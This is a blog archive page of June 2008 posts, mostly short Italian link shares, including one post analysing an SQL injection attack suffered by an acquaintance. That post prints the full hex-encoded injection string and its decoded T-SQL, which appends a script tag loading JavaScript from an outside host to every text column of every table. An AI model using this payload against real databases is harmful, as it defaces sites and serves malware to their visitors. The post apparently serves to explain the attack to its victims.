June 2008 Blog Posts

Microsoft Source Code Analyzer for SQL Injection

Community Technology Preview (June 2008) Microsoft Source Code Analyzer for SQL Injection is a static code analysis tool for finding SQL Injection vulnerabilities in ASP code. Customers can run the tool on their ASP source code to help identify code paths that are vulnerable to SQL Injection attacks. http://www.microsoft.com/downloads/details.aspx?FamilyID=58a7c46e-a599-4fcb-9ab4-a4334146b6ba&DisplayLang=en Ciao Massimiliano

posted @ Thursday, June 26, 2008 3:25 PM | Feedback (10)

...SQL Injection....

Ciao, per un mio conoscente affetto da SQL Injection (effettuavano degli update su una tabella), ci siamo accorti che eseguivano operazioni del tipo : SELECT * FROM xxxx where id=31786;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E75706461746561642E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S); Analizzando la stringa in binario, DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.updatead.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Ciao Massimiliano

posted @ Wednesday, June 18, 2008 10:14 AM | Feedback (13)

[SW] Kaspersky Internet Security 2009: Free key per 1 anno e 3 PC

Per chi può interessare !! :-) Ciao Massimiliano http://www.uploadsblog.com/2008/06/11/kaspersky-internet-security-2009-free-key-per-1-anno-e-3-pc/  

posted @ Wednesday, June 11, 2008 8:58 AM | Feedback (12)

Le categorie di PM :-)

Che ne pensate ? :-) http://punto-informatico.it/p.aspx?id=2310667 Ciao Massimiliano

posted @ Friday, June 6, 2008 9:08 AM | Feedback (5)

Chattare aiuta a diminuire le interruzioni sul lavoro

"...Chattare dal luogo di lavoro non diminuisce la produttività, ma al contrario l’aumenta....." Ma sarà vero ? Bah... http://www.downloadblog.it/post/6870/chattare-aiuta-a-diminuire-le-interruzioni-sul-lavoro Ciao Massimiliano

posted @ Thursday, June 5, 2008 8:47 AM | Feedback (10)